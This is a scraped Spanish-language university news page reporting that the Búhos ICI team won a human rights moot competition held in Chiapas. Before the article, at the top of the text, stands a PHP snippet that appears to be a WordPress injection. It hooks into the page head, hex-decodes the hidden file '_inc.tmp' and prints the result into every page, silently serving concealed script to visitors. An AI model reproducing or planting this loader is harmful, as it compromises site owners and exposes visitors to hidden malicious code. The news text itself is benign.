if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } GANA PRIMER LUGAR EL EQUIPO BÚHOS ICI EN EL MARATÓN DE DERECHOS HUMANOS – La Opinión Universitaria La Opinión Universitaria
Menu

GANA PRIMER LUGAR EL EQUIPO BÚHOS ICI EN EL MARATÓN DE DERECHOS HUMANOS

 

 

El pasado seis de diciembre se llevó a cabo el MARATÓN DE DERECHOS HUMANOS, organizado por la Revista Jurídica «PRIMERA INSTANCIA», en la Universidad Autónoma de Chiapas. Dicha competencia tiene como objetivo principal, fomentar el estudio y conocimiento en materia de Derechos Humanos para los futuros operadores jurídicos. El Maratón consta de tres fases: la primera siendo una competencia de conocimientos de dicha materia, en donde los equipos deben responder con precisión fechas, acontecimientos e instrumentos nacionales e internacionales sobre la temática de los Derechos Humanos, la segunda fase consiste en la presentación escrita de una ponencia sobre un caso planteado ante la Corte Interamericana de Derechos Humanos y la última con expresión oral con la presentación de un integrante del equipo de una ponencia ante el auditorio y expertos en el tema.

Los equipos participantes fueron: los dos representativos de Estudiantes de la UACH campus San Cristobal de las Casas, y del Campus Tuxtla Gutierrez y el equipo representativo del Estado de Puebla con el equipo BÚHOS DEL ICI, quién con una brillante participación se hizo acreedor al PRIMER LUGAR fungiendo como su asesora la Mtra. Carolina Escalante Aurioles.

Cabe destacar que el ICI en el mes de marzo desde hace 4 años organiza el concurso denominado «SIMULACRO DE JUICIOS ANTE LA CIDH» avalado por la Asociación Nacional de Facultades, Escuelas, Departamentos de Derecho e Institutos de Investigación Jurídica A.C. (ANFADE).

  • Tweets recientes